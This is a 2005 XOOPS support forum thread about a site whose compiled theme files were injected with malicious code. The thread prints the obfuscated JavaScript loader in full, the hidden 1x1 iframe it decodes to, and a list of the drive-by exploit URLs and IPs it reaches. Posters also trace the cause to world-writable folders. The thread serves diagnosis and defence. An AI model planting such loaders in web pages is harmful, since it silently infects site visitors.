1
phppp
Norton detected virus on my XOOPS site
  • 2005/6/20 12:52

  • phppp

  • XOOPS Contributor

  • Posts: 2857

  • Since: 2004/1/25


I am building a new site for XOOPS 2.2 and MarcoFr reported virus
Quote:

Norton detects several viruses :
. Downloader.Trojan
. Bloodhound.Exploit.6


After checking the source code, I found one line just before </body></html>
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>


What does it mean?
How could the scripts be generated?
If anyone happens to have same experiences, would be an interesting topic

Additional:
1 the scripts disappeard after I re-uploaded the "default" them
2 I think there is virus on my computer (WinXP)

2
kaotik
Re: Norton detected virus on my XOOPS site
  • 2005/6/20 14:37

  • kaotik

  • Just can't stay away

  • Posts: 861

  • Since: 2004/2/19


I was hit by something similar this weekend, someone managed to run an infected php file from my site. It appeared to be inside the theme. I didn't dig into it for fear of further contamination so I reinstalled the whole site.

3
Watdehek
Re: Norton detected virus on my XOOPS site
  • 2005/6/20 14:46

  • Watdehek

  • Friend of XOOPS

  • Posts: 130

  • Since: 2005/2/21


Do you have the Protector module installed?

If not, I advise you to do so.

4
wtravel
Re: Norton detected virus on my XOOPS site

I am very curious about how these attacks took place, so we can see if a vulnerability in XOOPS was used or (more likely) another vulnerability was used giving access to the webserver.

5
phppp
Re: Norton detected virus on my XOOPS site
  • 2005/6/20 15:57

  • phppp

  • XOOPS Contributor

  • Posts: 2857

  • Since: 2004/1/25


Quote:
Do you have the Protector module installed?


It is an experimental site solely for XOOPS 2.2 and no modules other than system, profile, pm and CBB will be installed at this moment, for this purpose.


I have some other sites on the same server, only one site ever had the problem.

6
phppp
Re: Norton detected virus on my XOOPS site
  • 2005/6/22 21:32

  • phppp

  • XOOPS Contributor

  • Posts: 2857

  • Since: 2004/1/25


follow up:
The files in template_c, mainly compiled theme files are hacked with that line.

I also have a plog site hacked.

We have not found out the hole but seems that it is not a XOOPS specific problem.

7
Mithrandir
Re: Norton detected virus on my XOOPS site

just out of curiousity, I wanted to see what it said and this is the result:
<div style="visibility: hidden; position: absolute; left: 1; top: 1;">
    <
iframe src="http://user10.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe>
</
div>

8
jdseymour
Re: Norton detected virus on my XOOPS site

Looks very similar to the discussion in This Thread.

9
phppp
Re: Norton detected virus on my XOOPS site
  • 2005/6/22 22:08

  • phppp

  • XOOPS Contributor

  • Posts: 2857

  • Since: 2004/1/25


got confirmation from server admin:

Quote:

The hacker exploited a vulnerable ***** installation to get in to the server.
...
Basically, if you keep your folder or files world writeable a hacker can easily put his code in your files. So avoid keeping the files 777.


***** -- a famous bulletin board system

the folder or files with 777 are XOOPS/template_c, but it is required.

10
m0nty
Re: Norton detected virus on my XOOPS site
  • 2005/6/22 22:10

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


here's the results from the trojan.. essentially what it tries to do.. (i'm removing part of the http tho for safety)

tp://user10.iframe.ru/?s=1
tp://69.50.177.102/x155/ind.php
tp://195.95.218.173/dl/adv782.php
tp://www.globolook.com/v458/wow.html
tp://www.expdialer.com/advert/728/index.html
tp://69.50.177.102/x155/count2.htm
tp://69.50.177.102/x155/count5.htm
tp://195.95.218.173/dl/adv782/sploit.anr
tp://195.95.218.173/dl/newexpl.php?adv=adv782
tp://195.95.218.173/dl/adv782/sploit.anr
tp://195.95.218.173/dl/adv782/sploit.anr
tp://195.95.218.173/dl/adv782/sploit.anr
tp://195.95.218.173/dl/newexpl.php?adv=adv782


so now u know the ip addresses it works on, who's gonna get those shutdown?

Login

Who's Online

196 user(s) are online (121 user(s) are browsing Support Forums)


Members: 0


Guests: 196


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits